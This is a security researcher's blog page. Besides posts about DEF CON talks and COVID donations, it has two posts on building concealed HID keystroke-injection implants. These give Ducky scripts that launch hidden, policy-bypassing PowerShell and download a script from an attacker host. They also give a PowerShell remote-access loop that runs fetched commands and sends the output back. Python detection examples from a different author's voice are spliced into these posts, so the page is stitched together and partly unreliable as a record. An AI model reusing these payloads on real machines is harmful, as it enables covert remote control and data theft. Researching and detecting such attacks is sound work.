David Sopas

hacker, father, tinker

David Sopas – Web Security Researcher
10/08/20 – Meetings, My Events

Our DEF CON 28 day was a blast

Four Portuguese security researchers presented at DEF CON this year. I’m sure that was a record 🙂

  • Paulo Silva and I with API (in)Security TOP 10: Guided tour to the Wild Wild World of APIs (the recording is on YouTube).
  • Pedro Umbelino and João Morais with Android Bug Foraging (the talk is on YouTube).

With this in mind, we got together in the Char49 meeting room and watched it together… with drinks and pizza.

The fun was just starting. In Pedro and João’s talk they included a never-before-shown video about the Google Camera issue, in which I was the victim of the vulnerability.

We even kept the con tradition of “Shoot the N00b” for first-time speakers – drink a shot before the talk. The poison was Pedro Umbelino’s homemade firewater. I would be lying if I said it didn’t hurt going down 🙂

In the end we had a lot of fun and I hope next year we can be together again giving a talk at DEF CON. Who knows?

PS: A new entry on my bucket list can now be checked – be a speaker at DEF CON.
30/07/20 – Meetings, My Events

DEF CON 28 here I go

Even in Safe Mode, DEF CON 28 will be legendary, especially because for the first time… I’ll be a speaker 🙂
Some of my research had already been presented at DEF CON, but now I’ll actually be speaking at the best security event in the world.

Paulo Silva and I will be talking about API (in)Security TOP 10: Guided tour to the Wild Wild World of APIs at AppSec Village and you can’t miss it.

Check out the agenda and don’t forget also to check Android Bug Foraging from my mates Pedro Umbelino and João Morais.
30/07/20 – Donations

A small gesture on this pandemic times

Since the middle of April I have been helping health professionals, firefighters and everyone on the front line against COVID-19 with 3D-printed visors and ear-savers.
After a while the scope widened: anyone could ask for this kind of protection and in exchange they would offer goods, which were later distributed among local associations.

Sharing is caring, right? And why not?

In total I printed on my 3D printer 684 objects:

  • 364 visors
  • 251 ear-savers
  • 19 multi-tools
  • 47 mask carriers

In return I distributed more than 1200 units of goods:

  • 266 L of milk
  • 213 children diapers
  • 91 tuna cans
  • 85 kilos of pasta
  • 76 eggs

And many other products.

I tried to help as much as possible, especially associations that help families with children.
I thought for a while about whether to post this, but after talking with some people they told me, why not… Maybe someone will pick up the idea and do the same in other places.

So if you want to start, ping me on Twitter.

04/03/20 – My Events

Speaker at ENEI2020

Last Wednesday I gave a talk at ENEI2020 with the topic “Do I need a hoodie to hack a bank?”. It was focused on a red-team assessment I did, and the goal was to show computing students a little bit about security, especially:

  • Recon
  • Social Engineering
  • Implants
  • Dead-drops

It was quite interesting because I got a lot of good feedback from the audience.
I hope they liked it.

27/12/19 – Hardware, Tips and Tricks

Gone in 30 seconds – a HID cable story tale

Following what I mentioned in my previous post, I went to my electronics bin and gathered a Logitech Wireless mouse (M185) and a USB cable.

On the mouse, I took the receiver – a Logitech Unifying Receiver CU0010 (nRF24L family):

Cut off one end of a random USB cable:

Split the wires:

Removed the cap from the Logitech receiver:

Soldered (I really need to improve my soldering skills) the wires (GND, Data+, Data- and VCC) onto the receiver:

Put the USB connector cap back on:

Added a nice plastic USB enclosure to make it look more real:

The whole process was fast: it took me around 5 minutes to cut, solder and super-glue everything together. In the end I think it could be better, especially where I rammed the USB connector with a knife.

The second part took a little longer, because I wanted an alternative to the existing HID cables – so I went with a CrazyRadio with the Bastille firmware and, as a final touch, the bettercap HID module to send my Ducky payload. I wanted to take advantage of what I already had, and that’s it.

This is basically a walkthrough of what I did:

  • Write down the MAC address of the device (using hid.recon from bettercap or by checking the properties of the device – this will depend on your OS).
  • Write your Ducky payload – in this PoC it is just a reverse shell to my VPS:

        DELAY 750
        GUI r
        DELAY 500
        STRING cmd
        ENTER
        DELAY 500
        STRING powershell -NoP -NonI -Exec Bypass -W hidden "IEX (New-Object System.Net.WebClient).DownloadString('http://ATTACKER_IP/ps.txt')"
        ENTER
        DELAY 750

    PowerShell script:

        function getUser() {
            $string = ([System.Security.Principal.WindowsIdentity]::GetCurrent().Name) | Out-String
            $string = $string.Trim()
            return $string
        }

        function getComputerName() {
            $string = (Get-WmiObject Win32_OperatingSystem).CSName | Out-String
            $string = $string.Trim()
            return $string
        }

        $resp = "http://ATTACKER_IP:8000/rat"
        $w = New-Object Net.WebClient
        while($true) {
            [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
            $r_get = $w.DownloadString($resp)
            $d = [System.Convert]::FromBase64String($r_get);
            $Ds = [System.Text.Encoding]::UTF8.GetString($d);

            while($r_get) {
                $output = invoke-expression $Ds | out-string
                $w.UploadString($resp, $output)
                break
            }
        }

  • Connect the HID cable to the Windows victim machine (don’t forget that the payload is OS dependent).
  • Start your listener on the attacker machine.
  • Connect the CrazyRadio and start bettercap, then run the injection at the bettercap prompt:

        bettercap -eval="hid.recon on"
        hid.inject MAC PT ducky.txt

And it’s basically game over.
I did a short video to illustrate the PoC – https://www.youtube.com/watch?v=y9C-4bcgmIU.
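From the defender’s side, the thing that gives this away is not the cable but the typing: a STRING line is delivered at machine speed, with gaps between keystrokes that no human produces. The following is an added example (my own code, not from the post or from bettercap) of that timing heuristic, the same idea behind keystroke-injection protection tools such as Google’s ukip. The log format, the device names and the sample events are constructed, and the 30 ms / 5-key thresholds are assumptions to tune per environment.

```python
import re
from collections import defaultdict

# Constructed sample log (not from the post): one keystroke event per line, as a
# hypothetical input-event monitor might emit it. Timestamps are milliseconds.
# "kbd-human" types at human speed; "hid-inject" delivers a STRING at machine speed.
SAMPLE_LOG = """\
ts=0    dev=kbd-human  key=c
ts=140  dev=kbd-human  key=m
ts=310  dev=kbd-human  key=d
ts=480  dev=kbd-human  key=ENTER
ts=1000 dev=hid-inject key=p
ts=1008 dev=hid-inject key=o
ts=1015 dev=hid-inject key=w
ts=1023 dev=hid-inject key=e
ts=1031 dev=hid-inject key=r
ts=1040 dev=hid-inject key=s
"""

LINE_RE = re.compile(r"ts=(\d+)\s+dev=(\S+)\s+key=(\S+)")


def parse_events(log_text):
    """Parse the log into (device, timestamp_ms, key) tuples, skipping malformed lines."""
    events = []
    for line in log_text.splitlines():
        match = LINE_RE.search(line)
        if match:
            events.append((match.group(2), int(match.group(1)), match.group(3)))
    return events


def inter_key_intervals(events):
    """Map each device to the list of gaps (ms) between its consecutive keystrokes."""
    stamps = defaultdict(list)
    for device, ts, _key in events:
        stamps[device].append(ts)
    intervals = {}
    for device, times in stamps.items():
        times.sort()
        intervals[device] = [later - earlier for earlier, later in zip(times, times[1:])]
    return intervals


def flag_injection(events, window=5, max_interval_ms=30):
    """Flag a device once it delivers `window` consecutive keystrokes with every gap
    at or below max_interval_ms. Returns {device: index of the keystroke that
    completed the burst}. A 30 ms gap is well under a fast typist's ~80 ms, so a
    5-key burst at that rate is a strong signal of injection."""
    flagged = {}
    for device, gaps in inter_key_intervals(events).items():
        run = 0
        for i, gap in enumerate(gaps):
            run = run + 1 if gap <= max_interval_ms else 0
            if run >= window - 1:
                flagged[device] = i + 1
                break
    return flagged


if __name__ == "__main__":
    for device, idx in flag_injection(parse_events(SAMPLE_LOG)).items():
        print(f"possible keystroke injection from {device} (burst completed at keystroke {idx})")
```

The threshold trades against false positives from barcode scanners and password managers, and a payload typed slowly will not trip it, so this belongs next to process-creation monitoring rather than in place of it. On a real host the event source would be evdev on Linux or a raw-input hook on Windows; the response, as ukip does it, is to detach the offending device.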

In the process of creating this HID cable from “leftovers” I learned a few things:

  • Some Logitech Unifying receivers are not vulnerable to some known attacks – like keystroke injection;
  • Be careful when putting solder on the USB contacts. Just put a small amount and spread it slightly with your iron, that way the PCB will fit better on the USB connector;
  • Do a first run on a USB hub just to make sure you don’t burn your laptop port or something;
  • Don’t waste money buying expensive HID cables (especially when they are rip-offs of others’ work) when you can make your own for less than $10;
  • Last point: don’t keep your brain focused on doing what others do, and don’t be afraid to fail at first. Be persistent and never quit.
19/12/19 – Hardware, Tips and Tricks

Make HID great again

I have been using HID devices on red-team assessments at Char49 since forever – especially the Rubber Ducky and lately the Cactus WHID.
I wanted to play a little more, so I picked one of my favourite tools from my arsenal, the tiny Digispark. This ATtiny85 board with 8 KB of flash memory has become part of most of my assessments, from dead-drops to implants.

My last implant – we can call it HID modding – was to add a Digispark inside a damaged wireless adapter. The only components I kept from the original product were the USB connector and the external case.
Before connecting everything, I did a lab test using an old USB connector and the Digispark with soldered pins.

Why? In the past I have found bad PCB prints that swapped DATA+ and DATA- (on the Digispark they are labelled USB+ and USB-), so before putting my shitty soldering skills to work I created this setup for future HID modding.

I ended up with the following schematics:

Everything was working properly so I added everything inside the Wireless Adapter and used super-glue to close the case.

Now I had a concealed HID device that I can leave at a client and make them think it is just an innocent network device.

The only part missing is the code. I connected the device to Arduino IDE and uploaded my sketch – which will do the following:

  1. Download a file from my domain using powershell
  2. Execute the ps1 file
  3. Get the reverse shell which pointed to my VPS

Ducky payload (I used duck2spark from mame82 to convert my Duck scripts to Digispark source):

DELAY 750
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 500
STRING powershell -NoP -NonI -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('http://YOUR-IP/ps.txt',\"file.ps1\")";
ENTER
DELAY 750
STRING cls
ENTER
DELAY 500
STRING powershell -W Hidden .\file.ps1
ENTER

Powershell script:

function getUser() {
    $string = ([System.Security.Principal.WindowsIdentity]::GetCurrent().Name) | Out-String
    $string = $string.Trim()
    return $string
}

function getComputerName() {
    $string = (Get-WmiObject Win32_OperatingSystem).CSName | Out-String
    $string = $string.Trim()
    return $string
}

$resp = "http://YOUR-IP:8000/rat"
$w = New-Object Net.WebClient
while($true) {
    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
    $r_get = $w.DownloadString($resp)
    $d = [System.Convert]::FromBase64String($r_get);
    $Ds = [System.Text.Encoding]::UTF8.GetString($d);

    while($r_get) {
        $output = invoke-expression $Ds | out-string
        $w.UploadString($resp, $output)
        break
    }
}

I created a small video for educational purposes only – find it here.

The target machine was a fresh and up-to-date Windows 10 Pro install with Windows Defender and Firewall on.
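Defender and the firewall did not stop the payload, but the command line the Ducky script types is loud in process-creation telemetry. Below is an added example (my own code, not from the post or from any tool it mentions) that scores Sysmon Event ID 1 / Security 4688 CommandLine values against the indicators present in both of these posts’ payloads: execution-policy bypass, hidden window, IEX with a WebClient download cradle. The sample command lines are constructed (ATTACKER_IP is the page’s own placeholder), and the indicator weights and the alert threshold are my assumptions.

```python
import re

# Constructed sample "CommandLine" values (not from the post) as a process-creation
# event (Sysmon Event ID 1 or Security 4688) would record them. The first two mimic
# the download cradle typed by the Ducky payloads, the third is the second stage,
# the last two are ordinary admin usage. ATTACKER_IP is a placeholder.
SAMPLE_COMMAND_LINES = [
    'powershell -NoP -NonI -Exec Bypass -W hidden "IEX (New-Object System.Net.WebClient).DownloadString(\'http://ATTACKER_IP/ps.txt\')"',
    'powershell -NoP -NonI -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile(\'http://ATTACKER_IP/ps.txt\',\\"file.ps1\\")"',
    'powershell -W Hidden .\\file.ps1',
    'powershell.exe -Command "Get-Service | Where-Object Status -eq Running"',
    'powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1',
]

# (indicator name, weight, regex). Weights are a judgement call: a download cradle
# or Invoke-Expression is far stronger evidence than a lone -NoProfile.
INDICATORS = [
    ("download_cradle", 3, re.compile(r"Net\.WebClient|DownloadString|DownloadFile", re.I)),
    ("invoke_expression", 2, re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("hidden_window", 2, re.compile(r"-W(?:indowStyle)?\s+hidden", re.I)),
    ("exec_bypass", 2, re.compile(r"-Exec(?:utionPolicy)?\s+Bypass", re.I)),
    ("no_profile", 1, re.compile(r"-NoP(?:rofile)?\b", re.I)),
    ("non_interactive", 1, re.compile(r"-NonI(?:nteractive)?\b", re.I)),
    ("remote_url", 1, re.compile(r"https?://", re.I)),
    ("local_relative_script", 1, re.compile(r"\.\\\S+\.ps1\b", re.I)),
]


def score_command_line(cmd):
    """Return (score, [matched indicator names]) for one command line."""
    hits = [name for name, _weight, pattern in INDICATORS if pattern.search(cmd)]
    score = sum(weight for name, weight, _pattern in INDICATORS if name in hits)
    return score, hits


def find_suspicious(command_lines, threshold=5):
    """Return [(index, score, hits)] for command lines scoring at or above the
    threshold, highest score first."""
    alerts = []
    for i, cmd in enumerate(command_lines):
        score, hits = score_command_line(cmd)
        if score >= threshold:
            alerts.append((i, score, hits))
    return sorted(alerts, key=lambda alert: -alert[1])


if __name__ == "__main__":
    for index, score, hits in find_suspicious(SAMPLE_COMMAND_LINES):
        print(f"[{score:2d}] line {index}: {', '.join(hits)}")
        print(f"      {SAMPLE_COMMAND_LINES[index]}")
```

The second stage from this post (`powershell -W Hidden .\file.ps1`) scores only 3 on its own, which is why the first-stage cradle is the better detection point; with PowerShell script block logging (Event ID 4104) enabled, the downloaded script’s invoke-expression loop gives a second chance to catch it.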

How much did it cost?

Well, the only real cost was the Digispark, which you can get on AliExpress for 1 to 3 bucks a piece.

I already have other ideas, like adding a Digispark to other “junk” in my “crappy stuff that I should recycle” pile – RC toys, USB converters, IP cameras, etc.

To conclude this post, I recently bought Evil Crow Cable and O.MG DemonSeed EDU so I hope to have time to explore these devices.

To learn more about HID, you should follow these talented guys on Twitter – @mame82, @lucabongiorni and @_MG_.
Also I recommend everyone to see the talk from my mate @kripthor regarding the steps on creating UberHid.

Any feedback feel free to ping me on Twitter – @dsopas.
23/08/19 – Hardware, Tools, Travel

My Red Team assessment hardware

Many friends and colleagues ask me what I use for red team assessments, so I decided to write a post about my arsenal – which may not reflect other Red Teams’ approach.

Also, the hardware is task-specific. For example, if you’re going on a Wi-Fi hunt you might not need a set of lockpicking tools – well, you never know 🙂

Other people’s lists can be found here:

Feel free to Tweet @dsopas with new lists or even recommend stuff for me to buy 🙂

22/08/19 – Hardware

Pointer hijack and portapack testing

When I was at Casa das Artes – the venue for an event where I was going to give a talk – I was discussing some RF topics with my pal Zezadas. One of them was playing with RF pointers… I went home the next day and did a small prank that involved a HackRF replay of a Windows shutdown (works on 7 or 10) – video -> here!

If you want to have real fun with pointers, check out mame82’s LOGITacker research.

BUT not content with that, I finally got a PortaPack for the “portability” of the HackRF. What should the first video showing off the PortaPack be? My cat’s RF mouse 😀

Video? -> here!

22/08/19 – Interesting Readings

Checkmarx Security Research Team latest work

We’ve got a lot of new research in our hands but so far only one got disclosed to the public.

I’m talking about the LeapFrog LeapPad Ultimate research. It got a few hits in the media (CNET, The Telegraph, ZDNet, BleepingComputer, Threatpost, Fortune, …) and I’m very proud of this work, especially because it keeps children more secure.

You can see a small PoC video here and the full research at the Checkmarx blog.
